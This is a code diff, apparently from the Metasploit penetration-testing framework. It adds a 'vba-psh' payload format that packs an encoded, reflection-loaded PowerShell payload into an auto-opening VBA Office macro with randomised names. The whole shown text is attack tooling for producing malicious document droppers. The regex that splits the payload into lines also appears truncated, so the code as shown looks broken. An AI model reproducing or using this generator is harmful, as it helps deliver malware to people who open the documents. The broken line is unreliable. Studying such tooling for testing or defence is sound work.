@@ -1001,6 +1001,33 @@ def self.to_vba(framework,code,opts = {})
10011001 read_replace_script_template ( "to_mem.vba.template" , hash_sub )
10021002 end
10031003
1004+ def self . to_powershell_vba ( framework , arch , code )
1005+ template_path = File . join ( Msf ::Config . data_directory ,
1006+ "templates" ,
1007+ "scripts" )
1008+
1009+ powershell = Rex ::Powershell ::Command . cmd_psh_payload ( code ,
1010+ arch ,
1011+ template_path ,
1012+ encode_final_payload : true ,
1013+ remove_comspec : true ,
1014+ method : 'reflection' )
1015+
1016+ # Intialize rig and value names
1017+ rig = Rex ::RandomIdentifierGenerator . new ( )
1018+ rig . init_var ( :sub_auto_open )
1019+ rig . init_var ( :var_powershell )
1020+
1021+ hash_sub = rig . to_h
1022+ # VBA has a maximum of 24 line continuations
1023+ line_length = powershell . length / 24
1024+ vba_psh = '"' << powershell . scan ( /.{1,#{ line_length } ) . join ( "\" _\r \n & \" " ) << '"'
1025+
1026+ hash_sub [ :powershell ] = vba_psh
1027+
1028+ read_replace_script_template ( "to_powershell.vba.template" , hash_sub )
1029+ end
1030+
10041031 def self . to_exe_vbs ( exes = '' , opts = { } )
10051032 delay = opts [ :delay ] || 5
10061033 persist = opts [ :persist ] || false
@@ -1904,6 +1931,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
19041931 when 'vba-exe'
19051932 exe = to_executable_fmt ( framework , arch , plat , code , 'exe-small' , exeopts )
19061933 Msf ::Util ::EXE . to_exe_vba ( exe )
1934+ when 'vba-psh'
1935+ Msf ::Util ::EXE . to_powershell_vba ( framework , arch , code )
19071936 when 'vbs'
19081937 exe = to_executable_fmt ( framework , arch , plat , code , 'exe-small' , exeopts )
19091938 Msf ::Util ::EXE . to_exe_vbs ( exe , exeopts . merge ( { :persist => false } ) )
@@ -1950,6 +1979,7 @@ def self.to_executable_fmt_formats
19501979 "psh-cmd" ,
19511980 "vba" ,
19521981 "vba-exe" ,
1982+ "vba-psh" ,
19531983 "vbs" ,
19541984 "war"
19551985 ]
0 commit comments